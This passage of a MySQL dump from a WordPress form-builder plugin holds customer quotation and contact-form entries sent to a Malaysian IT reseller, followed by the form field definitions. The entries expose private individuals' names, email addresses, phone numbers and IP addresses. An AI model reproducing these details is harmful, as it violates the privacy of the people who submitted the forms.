Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Datakraf Solution Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"C-16-05 SUNWAY NEXIS\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-12 18:52:51','110.159.135.171','1'),(366,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"CHRIS CHOW\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"chrischowss@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123062211\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Comed SDN Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Sunway\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"TOUGHPAD FZ-G1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-13 11:12:29','113.210.192.239','1'),(367,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"NAjib Khalid\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"najibkhalid@vostermans.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129703638\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Vostermans ventilation\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Please quote ZT42063 ZT420 Zebra printer\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-13 12:20:07','60.54.41.3','1'),(368,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"NAjib Khalid\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"najibkhalid@vostermans.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129703638\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Vostermans ventilation\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Please quote ZT42063 ZT420 Zebra printer\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-13 12:20:09','60.54.41.3','1'),(369,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"WINNIE LEE\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"winnie@scientex.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60355191325\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Scientex Industries Group Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:122:\"Please quote us the price for the video conferencing system. The room is suitable for 4-5 pax ppl, and is use for business\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-13 15:23:13','202.188.22.154','1'),(370,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Shaharudin Hamidun\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"shn9113@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193309778\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Personal\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Do you provide IT support for Synology Installation?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-14 07:56:21','60.48.96.103','1'),(371,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"Joe Low\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"sales@wistronic.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123312241\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Wistronic Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:392:\"Hi Sales, Please quote for:- 1) Logiteh ConferenceCam Connect P/N: 960-001035 Qty: 1pce 2) Logitech Spotlight Presentation Remote P/N: 910-004864 Qty: 1 pce Thank you. Best regards, Linda Ting Wistronic Sdn Bhd 129, Jalan Pusat Komersial Saujana 3, Pusat Komersial Saujana, The Plazo S2 Height, 70300 Seremban, Negeri Sembilan, Malaysia. Office : +6012-331 2241 Email : sales@wistronic.com.my\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"41\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-14 09:30:09','60.50.64.32','1');
/*!40000 ALTER TABLE `wpdp_visual_form_builder_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_visual_form_builder_fields`
--

DROP TABLE IF EXISTS `wpdp_visual_form_builder_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_visual_form_builder_fields` (
  `field_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `field_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_type` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_options` text COLLATE utf8mb4_unicode_ci,
  `field_description` text COLLATE utf8mb4_unicode_ci,
  `field_name` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_sequence` bigint(20) DEFAULT '0',
  `field_parent` bigint(20) DEFAULT '0',
  `field_validation` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `field_required` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `field_size` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT 'medium',
  `field_css` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `field_layout` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `field_default` text COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`field_id`)
) ENGINE=MyISAM AUTO_INCREMENT=170 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_visual_form_builder_fields`
--

LOCK TABLES `wpdp_visual_form_builder_fields` WRITE;
/*!40000 ALTER TABLE `wpdp_visual_form_builder_fields` DISABLE KEYS */;
INSERT INTO `wpdp_visual_form_builder_fields` (`field_id`, `form_id`, `field_key`, `field_type`, `field_options`, `field_description`, `field_name`, `field_sequence`, `field_parent`, `field_validation`, `field_required`, `field_size`, `field_css`, `field_layout`, `field_default`) VALUES (1,1,'contact-us','fieldset','','','Contact Us',0,0,'','','','','',''),(2,1,'verification','verification','','','Verification',6,0,'','','','','',''),(3,1,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',7,2,'','yes','medium','','',''),(4,1,'submit','submit','','','Submit',8,2,'','','','','',''),(5,1,'full-name','text','','','Full Name',1,0,'','yes','small','','',''),(6,1,'email','text','','','Email',2,0,'email','yes','small','','',''),(7,1,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(8,1,'message','text','','','Message',5,0,'','yes','large','','',''),(10,1,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','medium','','',''),(11,2,'get-quotation-logitech','fieldset','','','Get Quotation (Logitech)',0,0,'','','','','',''),(12,2,'verification','verification','','','Verification',8,0,'','','','','',''),(13,2,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,12,'','yes','medium','','',''),(14,2,'submit','submit','','','Submit',10,12,'','','','','',''),(15,2,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(16,2,'email','text','','','Email',2,0,'email','yes','medium','','',''),(17,2,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(18,2,'message','text','','','Message',7,0,'','no','large','','',''),(19,2,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(21,2,'logitech-product','checkbox','a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}','','Logitech Product',6,0,'','yes','','','',''),(22,2,'address','text','','','Address',5,0,'','no','medium','','',''),(23,3,'get-quotation-panasonic-toughbook','fieldset','','','Get Quotation (PANASONIC TOUGHBOOK)',0,0,'','','','','',''),(24,3,'verification','verification','','','Verification',8,0,'','','','','',''),(25,3,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,24,'','yes','medium','','',''),(26,3,'submit','submit','','','Submit',10,24,'','','','','',''),(27,3,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(28,3,'email','text','','','Email',2,0,'email','yes','medium','','',''),(29,3,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(30,3,'message','text','','','Message',7,0,'','no','large','','',''),(31,3,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(32,3,'panasonic-toughbook','checkbox','a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}','','PANASONIC TOUGHBOOK',6,0,'','yes','','','',''),(35,4,'verification','verification','','','Verification',8,0,'','','','','',''),(33,3,'address','text','','','Address',5,0,'','yes','medium','','',''),(34,4,'get-quotation-acer','fieldset','','','Get Quotation (Acer)',0,0,'','','','','',''),(36,4,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,35,'','yes','medium','','',''),(37,4,'submit','submit','','','Submit',10,35,'','','','','',''),(38,4,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(39,4,'email','text','','','Email',2,0,'email','yes','medium','','',''),(40,4,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(41,4,'message','text','','','Message',7,0,'','no','large','','',''),(42,4,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(43,4,'acer','checkbox','a:17:{i:0;s:11:\"Swift 7 Pro\";i:1;s:6:\"Spin 1\";i:2;s:6:\"Spin 3\";i:3;s:10:\"Spin 5 Pro\";i:4;s:9:\"Switch 12\";i:5;s:18:\"Acer Chrome Tab 10\";i:6;s:19:\"Acer Chromebook R13\";i:7;s:18:\"Acer Chromebook 14\";i:8;s:27:\"Acer Chromebook 14 for Work\";i:9;s:23:\"Acer Chromebook 11 C730\";i:10;s:26:\"Acer Chromebook R 11 C738T\";i:11;s:21:\"Acer Chromebook 11 N7\";i:12;s:18:\"TravelMate Spin B1\";i:13;s:13:\"TravelMate P2\";i:14;s:13:\"TravelMate P4\";i:15;s:13:\"TravelMate P6\";i:16;s:32:\"Other (Please specify the 